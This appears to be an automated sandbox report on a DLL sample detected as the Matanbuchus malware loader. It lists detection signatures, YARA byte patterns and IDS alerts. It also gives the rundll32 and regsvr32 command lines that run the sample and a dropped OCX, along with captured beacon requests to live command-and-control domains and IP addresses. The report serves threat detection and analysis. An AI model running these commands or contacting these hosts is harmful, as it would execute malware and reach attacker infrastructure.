Windows Analysis Report
file.dll

Overview

General Information

Sample name: file.dll
Analysis ID: 1526602
MD5: 0fcf31b2d27079babd1fa08ff5e302ae
SHA1: f896d351d98b7605280b3e5eb923254b73b0c6ad
SHA256: 673a791fe9d1be41e6ef53b640f22b6be06263cf4176874223178e24090b76e7
Tags: dllinit-moduleMatanbuchususer-Bitsight
Infos:

Detection

Matanbuchus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
AI detected suspicious sample
Uses known network protocols on non-standard ports
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 2876 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6932 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 4040 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • MpCmdRun.exe (PID: 5996 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
          • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6936 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7328 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,DllInit MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7404 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7504 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7512 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7520 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7536 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7552 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7568 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7588 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7600 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7620 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7632 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7692 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7732 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Init MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7752 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize MD5: 889B99C52A60DD49227C5E485A016679)
  • regsvr32.exe (PID: 7968 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 7984 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • cleanup
Name: Matanbuchus
Description: According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections. Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus
No configs have been found
Source: file.dll; Rule: JoeSecurity_Matanbuchus; Description: Yara detected Matanbuchus; Author: Joe Security
Source: file.dll; Rule: Windows_Trojan_Matanbuchus_58a61aaa; Description: unknown; Author: unknown
  • 0x300a0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55

Source: sslproxydump.pcap; Rule: Windows_Trojan_Matanbuchus_58a61aaa; Description: unknown; Author: unknown
  • 0x32eb0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55

Source: C:\Users\user\8f08\user-PC\user-PC.ocx; Rule: JoeSecurity_Matanbuchus; Description: Yara detected Matanbuchus; Author: Joe Security
Source: C:\Users\user\8f08\user-PC\user-PC.ocx; Rule: Windows_Trojan_Matanbuchus_58a61aaa; Description: unknown; Author: unknown
  • 0x300a0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55

Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Matanbuchus; Description: Yara detected Matanbuchus; Author: Joe Security
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Matanbuchus_4ce9affb; Description: unknown; Author: unknown
  • 0x1f365:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
  • 0x20ba5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Matanbuchus_58a61aaa; Description: unknown; Author: unknown
  • 0x53940:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_Matanbuchus; Description: Yara detected Matanbuchus; Author: Joe Security
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_Matanbuchus_4ce9affb; Description: unknown; Author: unknown
  • 0x1f365:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
  • 0x20ba5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B

Source: 34.2.regsvr32.exe.6b810000.0.unpack; Rule: JoeSecurity_Matanbuchus; Description: Yara detected Matanbuchus; Author: Joe Security
Source: 34.2.regsvr32.exe.6b810000.0.unpack; Rule: Windows_Trojan_Matanbuchus_58a61aaa; Description: unknown; Author: unknown
  • 0x300a0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
Source: 14.2.rundll32.exe.6d050000.1.unpack; Rule: JoeSecurity_Matanbuchus; Description: Yara detected Matanbuchus; Author: Joe Security
Source: 14.2.rundll32.exe.6d050000.1.unpack; Rule: Windows_Trojan_Matanbuchus_58a61aaa; Description: unknown; Author: unknown
  • 0x300a0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
Source: 14.2.rundll32.exe.4910000.0.unpack; Rule: JoeSecurity_Matanbuchus; Description: Yara detected Matanbuchus; Author: Joe Security

System Summary

Source: Network Connection; Author: Dmitriy Lifanov, oscd.community; Data: DestinationIp: 193.109.85.31, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 7984, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710

Timestamp: 2024-10-06T13:25:27.299380+0200; SID: 2034468; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source IP: 192.168.2.7; Source Port: 49763; Destination IP: 193.109.85.31; Destination Port: 54801; Protocol: TCP
Timestamp: 2024-10-06T13:27:45.270526+0200; SID: 2034468; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source IP: 192.168.2.7; Source Port: 49994; Destination IP: 193.109.85.31; Destination Port: 54801; Protocol: TCP

AV Detection

Source: https://semurox.com/account.aspx; Virustotal: Detection: 8%
Source: C:\Users\user\8f08\user-PC\user-PC.ocx; Virustotal: Detection: 16%
Source: file.dll; Virustotal: Detection: 16%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.dll; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: unknown; HTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

Networking

Source: Network traffic; Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49763 -> 193.109.85.31:54801
Source: Network traffic; Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49994 -> 193.109.85.31:54801
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 193.109.85.27 443
Source: C:\Windows\SysWOW64\regsvr32.exe; Network Connect: 193.109.85.31 54801
Source: unknown; Network traffic detected: HTTP traffic on port 49763 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 49765 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49763
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49765
Source: unknown; Network traffic detected: HTTP traffic on port 49771 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 49772 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49771
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49772
Source: unknown; Network traffic detected: HTTP traffic on port 49808 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49808
Source: unknown; Network traffic detected: HTTP traffic on port 49816 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49816
Source: unknown; Network traffic detected: HTTP traffic on port 49992 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 49993 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49992
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49993
Source: unknown; Network traffic detected: HTTP traffic on port 49994 -> 54801
Source: unknown; Network traffic detected: HTTP traffic on port 54801 -> 49994
Source: global traffic; TCP traffic: 192.168.2.7:49763 -> 193.109.85.31:54801
Source: Joe Sandbox View; ASN Name: M247GB M247GB
Source: Joe Sandbox View; ASN Name: M247GB M247GB
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 14_2_7F3B4560 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor
Source: global traffic; HTTP traffic detected: GET /account.aspx HTTP/1.1; User-Agent: Microsoft-WNS/11.0; Host: semurox.com; Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /detalis.aspx HTTP/1.1; User-Agent: Microsoft-WNS/11.0; Host: vilodeqa.com; Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /detalis.aspx HTTP/1.1; User-Agent: Microsoft-WNS/11.0; Host: vilodeqa.com; Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /detalis.aspx HTTP/1.1; User-Agent: Microsoft-WNS/11.0; Host: vilodeqa.com; Cache-Control: no-cache
Source: global traffic; DNS traffic detected: DNS query: semurox.com
Source: global traffic; DNS traffic detected: DNS query: vilodeqa.com
Source: unknown; HTTP traffic detected: POST /blueoceansite/templates/docs/index.php HTTP/1.1; User-Agent: Microsoft-WNS/10.0; Host: vilodeqa.com; Content-Length: 581; Content-Type: application/x-www-form-urlencoded; Accept-Language: fr-CA
Source: unknown; Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown; Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown; Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49701

System Summary

Source: file.dll, type: SAMPLE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: sslproxydump.pcap, type: PCAP; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_4ce9affb; Author: unknown
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED; Matched rule: Windows_Trojan_Matanbuchus_58a61aaa; Author: unknown
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7C42618_2_7ED7C426
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB154018_2_7EDB1540
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDA751018_2_7EDA7510
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB552018_2_7EDB5520
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB32D018_2_7EDB32D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7C27E18_2_7ED7C27E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE239018_2_7EDE2390
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDF53AC18_2_7EDF53AC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7B32B18_2_7ED7B32B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDAF19018_2_7EDAF190
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDB818018_2_7EDB8180
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7ED7412818_2_7ED74128
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEB9EF034_2_7EEB9EF0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBFA0034_2_7EEBFA00
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE828BF34_2_7EE828BF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6B5AE34_2_7EE6B5AE
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEC456034_2_7EEC4560
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EECFFE034_2_7EECFFE0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEAAFC034_2_7EEAAFC0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7DF4E34_2_7EE7DF4E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE82CBF34_2_7EE82CBF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEACC6034_2_7EEACC60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE75C4E34_2_7EE75C4E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7CC3134_2_7EE7CC31
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6DC1C34_2_7EE6DC1C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEEDDCB34_2_7EEEDDCB
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7CDD834_2_7EE7CDD8
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7ED6834_2_7EE7ED68
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7CD5534_2_7EE7CD55
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6ED3834_2_7EE6ED38
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEFCAEF34_2_7EEFCAEF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEF1ABD34_2_7EEF1ABD
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEEDA6634_2_7EEEDA66
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE82A3F34_2_7EE82A3F
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE74A3B34_2_7EE74A3B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6DA0234_2_7EE6DA02
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7DA0334_2_7EE7DA03
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7A8E834_2_7EE7A8E8
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE778CD34_2_7EE778CD
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6A9E334_2_7EE6A9E3
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE699D34_2_7EEE699D
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE8399234_2_7EE83992
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE894034_2_7EEE8940
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7693B34_2_7EE7693B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEED6D834_2_7EEED6D8
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6A69634_2_7EE6A696
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7867034_2_7EE78670
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE694FF34_2_7EE694FF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7C44C34_2_7EE7C44C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7C44834_2_7EE7C448
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7C42634_2_7EE7C426
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE6A43034_2_7EE6A430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEA751034_2_7EEA7510
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7C27E34_2_7EE7C27E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEF53AC34_2_7EEF53AC
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE239034_2_7EEE2390
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7B32B34_2_7EE7B32B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEB818034_2_7EEB8180
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEAF19034_2_7EEAF190
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE7412834_2_7EE74128
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7EDE1850 appears 33 times
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7EDEF80D appears 128 times
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7F3DF80D appears 128 times
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7EEEF80D appears 128 times
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
                Source: file.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                Source: file.dll, type: SAMPLEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
